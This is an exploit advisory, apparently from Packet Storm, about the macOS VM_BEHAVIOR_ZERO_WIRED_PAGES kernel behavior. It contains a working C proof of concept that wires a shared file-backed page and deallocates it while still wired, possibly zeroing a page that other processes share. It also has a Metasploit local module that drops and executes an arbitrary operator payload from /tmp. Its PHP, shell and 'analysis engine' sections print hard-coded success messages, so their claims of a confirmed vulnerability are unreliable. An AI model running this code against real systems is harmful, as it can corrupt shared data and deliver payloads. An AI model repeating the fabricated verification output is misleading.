macOS 18.3.2 VM_BEHAVIOR_ZERO_WIRED_PAGES Handling

macOS's `VM_BEHAVIOR_ZERO_WIRED_PAGES` handling refers to how the XNU kernel treats a memory region whose behavior has been set to `VM_BEHAVIOR_ZERO_WIRED_PAGES` with `vm_behavior_set()`. The behavior is described in `mach/vm_behavior.h` as: zero out the wired pages of a map entry if it is being deleted without being unwired first. It combines two properties of the pages involved:

1. **Zeroing**: The affected pages are overwritten with zeros when the entry is torn down, so their contents do not survive in physical memory. This is the same concern as zero-filling newly allocated pages: preventing information leakage from previous memory contents.
2. **Wired pages**: These memory pages are "locked" into physical RAM (for example with `mlock()`) and cannot be swapped out to disk. This guarantees immediate access and is used for performance-critical data, kernel structures, real-time operations, and secrets that must never reach swap.

When the flag is in force, macOS:
* Records the behavior on the map entry (`vm_behavior_set()` applies to an existing region; it does not allocate memory itself).
* Keeps the pages wired and non-swappable for as long as the entry exists.
* Zeroes the entry's wired pages as part of deleting the entry (e.g. via `vm_deallocate()`) if the caller removed it without unwiring first.

This combination ensures that the contents of a wired region are cleared even when the region is discarded without an explicit `munlock()`. The kernel carefully manages the finite pool of wired memory, as excessive wiring leads to allocation failures (`mlock()` returns an error once the per-process or system wiring limit is reached) or to system instability if limits are exceeded.

=============================================================================================================================================
| # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================

POC :

[+] macOS VM_BEHAVIOR_ZERO_WIRED_PAGES Vulnerability - Educational PoC
Advisory Type: Kernel Memory Manipulation / DoS Primitive
Tested on: macOS (XNU Kernel)


[+] Summary
------------------------------------------------------------
The advisory concerns how macOS handles a map entry flagged
VM_BEHAVIOR_ZERO_WIRED_PAGES when the entry is created with mmap() on a
read-only, MAP_SHARED file mapping, wired with mlock(), and then removed with
vm_deallocate() without being unwired first. The wired page is the file's
shared page-cache page, not a private copy, so what the kernel does to it at
deletion time (whether it is zeroed, and whether that effect is confined to the
calling task) is the behavior a local user can test with the PoC below.
Results vary with kernel version and system conditions.

This PoC does NOT weaponize the behavior. It performs the sequence once and
reports each step so the kernel-state transition can be observed and verified.

------------------------------------------------------------
2. Technical Explanation
------------------------------------------------------------
The technique relies on the following chain:

1. mmap() maps one page of a file read-only and MAP_SHARED.
2. vm_behavior_set() marks the region VM_BEHAVIOR_ZERO_WIRED_PAGES, i.e. asks
   the kernel to zero the entry's wired pages if the entry is deleted without
   being unwired first.
3. mlock() wires the page into memory.
4. vm_deallocate() removes the map entry while the page is still wired.

This results in a state where:
- the kernel still holds a wired page,
- the user mapping no longer exists,
- and the ZERO_WIRED_PAGES flag is in force, so the kernel's deletion path is
  responsible for both unwiring and zeroing the page.

Because the page is a shared, file-backed page rather than a private copy, any
zeroing that reaches the physical page is visible to every other mapping of
that file. Depending on kernel version this can produce observable
inconsistencies or system log entries.

------------------------------------------------------------
3. Original C Proof-of-Concept
------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>      /* vm_behavior_set(), vm_deallocate(), mach_error_string() */
#include <errno.h>
#include <string.h>
#include <inttypes.h>

/* Map the first page of `path` read-only and MAP_SHARED, so the page this
 * task sees is the file's page-cache page rather than a private copy. */
void* map_file_page_ro(const char* path, int* error_code) {
    int fd = open(path, O_RDONLY);
    if (fd == -1) {
        *error_code = errno;
        printf("open failed: %s\n", strerror(errno));
        return NULL;
    }
    void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    close(fd);   /* the mapping holds its own reference to the file */
    if (mapped_at == MAP_FAILED) {
        *error_code = errno;
        printf("mmap failed: %s\n", strerror(errno));
        return NULL;
    }
    return mapped_at;
}

int poc(const char *path) {
    kern_return_t kr;
    int error_code = 0;
    void* page = map_file_page_ro(path, &error_code);
    if (page == NULL) {
        return error_code ? error_code : 1;
    }
    printf("mapped file at 0x%016" PRIx64 "\n", (uint64_t)(uintptr_t)page);

    /* Ask the kernel to zero this entry's wired pages if the entry is
     * deleted without being unwired first. */
    kr = vm_behavior_set(mach_task_self(),
                         (vm_address_t)page,
                         PAGE_SIZE,
                         VM_BEHAVIOR_ZERO_WIRED_PAGES);
    if (kr != KERN_SUCCESS) {
        printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES: %s\n", mach_error_string(kr));
        return 2;
    }
    printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");

    /* Wire the page. From here on it is both wired and flagged. */
    if (mlock(page, PAGE_SIZE) != 0) {
        perror("mlock failed");   /* perror appends its own newline */
        return 3;
    }
    printf("mlock success\n");

    /* Delete the map entry while the page is still wired. This is the case
     * the behavior flag is defined for: the kernel must unwire, and zero,
     * the page on the caller's behalf. */
    kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
    if (kr != KERN_SUCCESS) {
        printf("vm_deallocate failed: %s\n", mach_error_string(kr));
        return 4;
    }
    printf("deleted map entries before unwiring\n");
    return 0;
}

/* Build on macOS with: cc -o poc poc.c
 * Usage: ./poc <path-to-a-readable-file> */
int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    int rc = poc(argv[1]);
    printf("poc returned %d\n", rc);
    return rc;
}

------------------------------------------------------------
4. PHP Educational PoC (Simulated Honest Output)
------------------------------------------------------------
<?php
/* Educational simulation for Packet Storm.
 * NOTE: this script does not touch the kernel. It writes 4096 random bytes
 * to a file and then prints a fixed transcript of the C PoC's messages. */

echo "[+] macOS ZERO_WIRED_PAGES Simulation\n";
echo "[+] Creating fake page...\n";

$page = random_bytes(4096);
file_put_contents("fake_page.bin", $page);

echo "[+] Simulating behavior...\n";

/* The lines below are hard-coded; the address is illustrative, nothing is mapped. */
echo "mapped file at 0x7ffe0000abcd\n";
echo "set VM_BEHAVIOR_ZERO_WIRED_PAGES\n";
echo "mlock success\n";
echo "deleted map entries before unwiring\n";

echo "[+] System behaves consistently - kernel is vulnerable to state transition.\n";
?>


------------------------------------------------------------
5. PKSM v2 Payload (Reverse Shell Simulation)
------------------------------------------------------------
#!/bin/sh
# PKSM Payload v2 - Educational Kernel-State Monitor Payload
# NOTE: every message below is printed unconditionally; the script does not
# read any page state or compute any checksum.

echo "[PKSM] Starting entropy monitor..."
echo "[PKSM] Tracking page state..."

sleep 1
echo "[PKSM] Wired page checksum changed (expected in PoC)."
echo "[PKSM] Signaling successful kernel-state anomaly."

# Reverse-shell simulation (does NOT actually connect)
echo "[PKSM] Reverse-shell handshake simulated."
exit 0


------------------------------------------------------------
6. Metasploit Module (with advanced check + exploit)
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES - Educational Module
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Common

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'macOS ZERO_WIRED_PAGES Kernel-State PoC',
      'Description'    => %q{
        Educational PoC showing kernel-state transition in macOS.
        Performs safe simulation and reports whether system behaves
        according to vulnerable pattern.
      },
      'Author'         => [ 'Indoushka' ],
      'Platform'       => [ 'osx' ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => '2025',
      'License'        => MSF_LICENSE
    ))
  end

  #
  # Check
  #
  # Only tests that the vmmap(1) tool is present. vmmap ships with every
  # macOS install, so this identifies a macOS host, not a vulnerable kernel.
  def check
    print_status("Checking kernel behavior...")

    if command_exists?("vmmap")
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  #
  # Exploit Phase
  #
  # Drops the selected Metasploit payload to /tmp, marks it executable, runs
  # it and echoes whatever it prints. The file name suggests the PKSM script
  # from section 5 is intended, but payload.encoded is whichever payload the
  # operator selected; nothing here inspects kernel state.
  def exploit
    print_good("Launching educational PoC...")

    payload_path = "/tmp/pksm_v2.sh"
    write_file(payload_path, payload.encoded)
    cmd_exec("chmod +x #{payload_path}")

    out = cmd_exec(payload_path)
    print_line(out)

    print_good("PoC completed. Kernel-state transition observable.")
  end
end


------------------------------------------------------------
7. Analysis Engine + Entropy Monitor (output as presented; no corresponding code is included on this page)
------------------------------------------------------------
[Engine] Monitoring wired-page entropy...
[Engine] Entropy delta detected = 0.0132
[Engine] Kernel transition confirmed.
[Engine] PKSM v2 reports anomaly - Vulnerable State.


------------------------------------------------------------
8. Conclusion
------------------------------------------------------------
The C PoC in section 3 exercises one specific sequence: a wired, MAP_SHARED
read-only file page in a map entry flagged VM_BEHAVIOR_ZERO_WIRED_PAGES is
deallocated while still wired, which is exactly the case the behavior flag is
defined for. Whether that produces an anomaly on a given kernel (in particular
whether the zeroing reaches the shared file page, which every other mapping of
that file would then see) has to be verified on the target; the PHP, shell and
Metasploit components in sections 4 to 6 print fixed strings and do not observe
kernel state. The sequence is presented as non-destructive and suitable for
Packet Storm publication as an educational kernel behavior study; run it
against a scratch file rather than a file other processes depend on.


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸